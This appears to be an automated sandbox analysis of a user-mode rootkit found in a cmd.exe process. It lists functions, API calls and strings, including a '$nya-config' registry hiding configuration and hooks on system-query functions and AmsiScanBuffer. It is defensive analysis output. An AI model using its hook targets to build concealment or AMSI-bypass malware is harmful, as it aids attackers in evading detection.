Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 2ae4e8f2e7df13ffbeee30f70ff522834c1a2eab6fba1a6f8eafdd0824ebd212
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 1F117131B14761B3FB609723A5797ED22B0BB9974DF70412DD406816D3EF7CC4988608

Function 000001929162F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001929162F611
GetFileType.KERNELBASE ref: 000001929162F627

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: d5fdaa17a377098f2b254171ce871c9ac55b207a50ee97555a78d439f3c6efad
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 2531C832A14B74A1F7748B2A95A02A93750F345BB8F740B4DDB6A973F1CB35D461C340

Function 00000192913EF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00000192913EF611
GetFileType.KERNELBASE ref: 00000192913EF627

Memory Dump Source

Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true

Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 0a93f4c1a67397024b1133c820c6a83c0bfac6788839b3a1f5b0f1ed97caa93f
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 3331C832610B64A3FB608B2695A03A93674F345BB8F75130DDB6A073F1CB75D4A1C744

Function 00000192913B2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000192913B302E

Memory Dump Source

Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 42e15ff2f108c98b6ab8693b8e964442862811d02fb079a449669280425918a9
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: F4910772B411B097EB54AF2AD4107BD73B5FB54B9CF64812EDE4A0778AEA34D812C708

Function 00000192913E1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000192913E1724: GetProcessHeap.KERNEL32 ref: 00000192913E172F
Part of subcall function 00000192913E1724: HeapAlloc.KERNEL32 ref: 00000192913E173E
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E17AE
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E17DB
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E17F5
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1815
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E1830
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1850
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E186B
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E188B
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E18A6
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E18C6

SleepEx.KERNELBASE ref: 00000192913E1BDF

Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E18E1
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1901
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E191C
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E193C
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E1957
Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1977
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E1992
Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E199C

Memory Dump Source

Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true

Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 3884de5eb32aa2378002382592c57e83735bdf73accb6db4f91dcf8db0c5b24e
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 2231AA75200761A3EF50AB27D9613E963B4BB48BD8F685429DE0BC77D7DE34C8A0861C

Non-executed Functions

Function 0000019291622FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000019291623094
lstrlenW.KERNEL32 ref: 00000192916232BE

Part of subcall function 0000019291621A30: OpenProcess.KERNEL32 ref: 0000019291621A56
Part of subcall function 0000019291621A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000019291621A74
Part of subcall function 0000019291621A30: PathFindFileNameW.SHLWAPI ref: 0000019291621A83
Part of subcall function 0000019291621A30: lstrlenW.KERNEL32 ref: 0000019291621A8F
Part of subcall function 0000019291621A30: StrCpyW.SHLWAPI ref: 0000019291621AA2
Part of subcall function 0000019291621A30: CloseHandle.KERNEL32 ref: 0000019291621AB0

GetProcAddress.KERNEL32 ref: 00000192916230A9

Part of subcall function 0000019291623F88: StrCmpNIW.SHLWAPI(?,?,?,000001929162272F), ref: 0000019291623FA0

StrCmpNIW.SHLWAPI ref: 00000192916230EC
lstrlenW.KERNEL32 ref: 0000019291623214

Strings

NtQueryObject, xrefs: 000001929162309F
\Device\Nsi, xrefs: 00000192916230DF
ntdll.dll, xrefs: 000001929162308D

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: d96a0a00f685b7fa756a5f4dcdc4f59a12f175890efc9a55aa6995d3ddb400ab
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: F5B18032B116A0A2EB588F27D5247D9B3A4F749BACF64941EEE0993B96DF35CD40C340

Function 00000192916284B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000192916284CC
RtlCaptureContext.NTDLL ref: 00000192916284F9
RtlLookupFunctionEntry.NTDLL ref: 0000019291628513
RtlVirtualUnwind.NTDLL ref: 0000019291628554
IsDebuggerPresent.KERNEL32 ref: 00000192916285A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000192916285C5
UnhandledExceptionFilter.KERNEL32 ref: 00000192916285D0

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: a70749b0c121d3b343f028842483e99958098e7ca8671cd8731bf1a41d9c8e71
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: B9318072705B9096EB648F61E8A03EE73A4F784748F54442EDB4E47B9AEF38C649C710

Function 000001929162CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001929162CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001929162CE23
RtlVirtualUnwind.NTDLL ref: 000001929162CE5E
IsDebuggerPresent.KERNEL32 ref: 000001929162CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001929162CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001929162CEAC

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: baa5d399a42a167ab2690c13ccead8d5d9a8c41abd479bb163fffa3d4579f551
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: AB418F37614F9096EB64CF26E8503DE73A4F788758F600529EA9D47B9ADF38C155CB00

Function 000001929162DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001929162DB99
FindNextFileW.KERNEL32 ref: 000001929162DCCF
FindClose.KERNEL32 ref: 000001929162DD0F
FindClose.KERNEL32 ref: 000001929162DD3B

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 7686628edc2eab42a11354a503a83483b2486879237f5beaebe73d8b8a59d018
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: E6A12832F046A069FB289B77D4643ED6BA4F74179CF344919DE99A7A9BCA38D041C700

Function 0000019291621724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001929162172F
HeapAlloc.KERNEL32 ref: 000001929162173E

Part of subcall function 0000019291621264: GetProcessHeap.KERNEL32 ref: 000001929162126A
Part of subcall function 0000019291621264: HeapAlloc.KERNEL32 ref: 0000019291621279
Part of subcall function 0000019291621264: GetProcessHeap.KERNEL32 ref: 0000019291621293
Part of subcall function 0000019291621264: HeapAlloc.KERNEL32 ref: 00000192916212A4

Part of subcall function 0000019291621000: GetProcessHeap.KERNEL32 ref: 0000019291621006
Part of subcall function 0000019291621000: HeapAlloc.KERNEL32 ref: 0000019291621015
Part of subcall function 0000019291621000: GetProcessHeap.KERNEL32 ref: 0000019291621028
Part of subcall function 0000019291621000: HeapAlloc.KERNEL32 ref: 0000019291621037

RegOpenKeyExW.ADVAPI32 ref: 00000192916217AE
RegOpenKeyExW.ADVAPI32 ref: 00000192916217DB
RegCloseKey.ADVAPI32 ref: 00000192916217F5
RegOpenKeyExW.ADVAPI32 ref: 0000019291621815
RegCloseKey.ADVAPI32 ref: 0000019291621830
RegOpenKeyExW.ADVAPI32 ref: 0000019291621850
RegCloseKey.ADVAPI32 ref: 000001929162186B
RegOpenKeyExW.ADVAPI32 ref: 000001929162188B
RegCloseKey.ADVAPI32 ref: 00000192916218A6
RegOpenKeyExW.ADVAPI32 ref: 00000192916218C6
RegCloseKey.ADVAPI32 ref: 00000192916218E1
RegOpenKeyExW.ADVAPI32 ref: 0000019291621901
RegCloseKey.ADVAPI32 ref: 000001929162191C
RegOpenKeyExW.ADVAPI32 ref: 000001929162193C
RegCloseKey.ADVAPI32 ref: 0000019291621957
RegOpenKeyExW.ADVAPI32 ref: 0000019291621977
RegCloseKey.ADVAPI32 ref: 0000019291621992
RegCloseKey.ADVAPI32 ref: 000001929162199C

Part of subcall function 00000192916212B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000019291621315
Part of subcall function 00000192916212B8: GetProcessHeap.KERNEL32 ref: 0000019291621323
Part of subcall function 00000192916212B8: HeapAlloc.KERNEL32 ref: 0000019291621334
Part of subcall function 00000192916212B8: RegEnumValueW.ADVAPI32 ref: 0000019291621393
Part of subcall function 00000192916212B8: GetProcessHeap.KERNEL32 ref: 00000192916213DB
Part of subcall function 00000192916212B8: HeapAlloc.KERNEL32 ref: 00000192916213E9
Part of subcall function 00000192916212B8: GetProcessHeap.KERNEL32 ref: 0000019291621406
Part of subcall function 00000192916212B8: HeapFree.KERNEL32 ref: 0000019291621414
Part of subcall function 00000192916212B8: lstrlenW.KERNEL32 ref: 000001929162141D
Part of subcall function 00000192916212B8: GetProcessHeap.KERNEL32 ref: 000001929162142B
Part of subcall function 00000192916212B8: HeapAlloc.KERNEL32 ref: 0000019291621439

Strings

pid, xrefs: 000001929162180E
tcp_remote, xrefs: 0000019291621935
service_names, xrefs: 00000192916218BF
udp, xrefs: 0000019291621970
tcp_local, xrefs: 00000192916218FA
process_names, xrefs: 0000019291621849
SOFTWARE\$nya-config, xrefs: 000001929162178E
startup, xrefs: 00000192916217D1
paths, xrefs: 0000019291621884

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: fc0962bbde5761b1ea567a8fd3dfee3bc8e4d4c406f4bf45cbe51bbd31e661f8
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 26715036B10A60A5EB109F27E8A06DC63B4FB84B8CF50551AEE5E87B2ADF39C445C340

Function 0000019291621E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000019291621E7F

Part of subcall function 00000192916222A8: GetModuleHandleA.KERNEL32(?,?,?,0000019291621EB1), ref: 00000192916222C0
Part of subcall function 00000192916222A8: GetProcAddress.KERNEL32(?,?,?,0000019291621EB1), ref: 00000192916222D1

CreateThread.KERNEL32 ref: 0000019291622043
TlsAlloc.KERNEL32 ref: 0000019291622049
TlsAlloc.KERNEL32 ref: 0000019291622055
TlsAlloc.KERNEL32 ref: 0000019291622061
TlsAlloc.KERNEL32 ref: 000001929162206D
TlsAlloc.KERNEL32 ref: 0000019291622079
TlsAlloc.KERNEL32 ref: 0000019291622085

Strings

EnumServicesStatusExW, xrefs: 0000019291621F71, 0000019291621F92
NtEnumerateValueKey, xrefs: 0000019291621F36
amsi.dll, xrefs: 0000019291622019
NtQueryDirectoryFileEx, xrefs: 0000019291621EFC
sechost.dll, xrefs: 0000019291621F99
EnumServiceGroupW, xrefs: 0000019291621F50
NtDeviceIoControlFile, xrefs: 0000019291621FB6
NtEnumerateKey, xrefs: 0000019291621F19
NtQueryDirectoryFile, xrefs: 0000019291621EDF
PdhGetRawCounterArrayW, xrefs: 0000019291621FD0
advapi32.dll, xrefs: 0000019291621F57, 0000019291621F78
AmsiScanBuffer, xrefs: 0000019291622012
NtResumeThread, xrefs: 0000019291621EC2
PdhGetFormattedCounterArrayW, xrefs: 0000019291621FF1
NtQuerySystemInformation, xrefs: 0000019291621EA5
pdh.dll, xrefs: 0000019291621FD7, 0000019291621FF8
ntdll.dll, xrefs: 0000019291621E8D

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 405dbc9284ab2ddd2e9d9d24ca6d12c6dff2f042029f2b04ef87db40eae23ac1
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: A451AC71D14A6AB5EB08EF66EC757D42320B74034CFA0491FE42A831ABDF7C825AC385

Function 00000192916212B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000019291621315
GetProcessHeap.KERNEL32 ref: 0000019291621323
HeapAlloc.KERNEL32 ref: 0000019291621334
RegEnumValueW.ADVAPI32 ref: 0000019291621393

Part of subcall function 0000019291621530: StrCmpIW.SHLWAPI ref: 0000019291621561

GetProcessHeap.KERNEL32 ref: 00000192916213DB
HeapAlloc.KERNEL32 ref: 00000192916213E9
GetProcessHeap.KERNEL32 ref: 0000019291621406
HeapFree.KERNEL32 ref: 0000019291621414
lstrlenW.KERNEL32 ref: 000001929162141D
GetProcessHeap.KERNEL32 ref: 000001929162142B
HeapAlloc.KERNEL32 ref: 0000019291621439
StrCpyW.SHLWAPI ref: 000001929162145B
GetProcessHeap.KERNEL32 ref: 0000019291621472
HeapFree.KERNEL32 ref: 0000019291621480

Strings

d, xrefs: 0000019291621356

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 56fec18403e07e6bb2d7e7d3ad1ac0f90fb660efa6915ae99bfb4877351b50a2
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 95517132A14B94A6EB24CF63E46839AB7A1F788F9DF544528DE4A47719DF3CC046C740

Function 000001929162EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001929162F34A,?,?,00000000,000001929162F2CD), ref: 000001929162EFF5
GetLastError.KERNEL32(?,?,00000000,000001929162F2CD), ref: 000001929162F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001929162F2CD), ref: 000001929162F049
VirtualProtect.KERNEL32 ref: 000001929162F0A5
VirtualProtect.KERNEL32 ref: 000001929162F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001929162F2CD), ref: 000001929162F11A
GetProcAddress.KERNEL32(?,?,00000000,000001929162F2CD), ref: 000001929162F126

Strings

api-ms-, xrefs: 000001929162F01B
ext-ms-, xrefs: 000001929162F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001929162F157, 000001929162F165

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 0d35b9b9e29a5c9128642412e0d5508dc58633a7d57ed29823720d1e47a00cec
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 6651A331B0172461FA189B5BA8207E56290BB49BB8FB80B2DDE3D873D6DF38D446C640

Function 00000192916233A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000192916233FD
GetProcessHeap.KERNEL32 ref: 0000019291623412
HeapAlloc.KERNEL32 ref: 0000019291623420
PdhGetCounterInfoW.PDH ref: 0000019291623436
StrCmpW.SHLWAPI ref: 000001929162344B

Part of subcall function 0000019291623950: StrCmpNW.SHLWAPI ref: 0000019291623972
Part of subcall function 0000019291623950: StrStrW.SHLWAPI ref: 0000019291623990
Part of subcall function 0000019291623950: StrToIntW.SHLWAPI ref: 00000192916239B7

GetProcessHeap.KERNEL32 ref: 0000019291623488
HeapFree.KERNEL32 ref: 0000019291623496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000019291623444

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

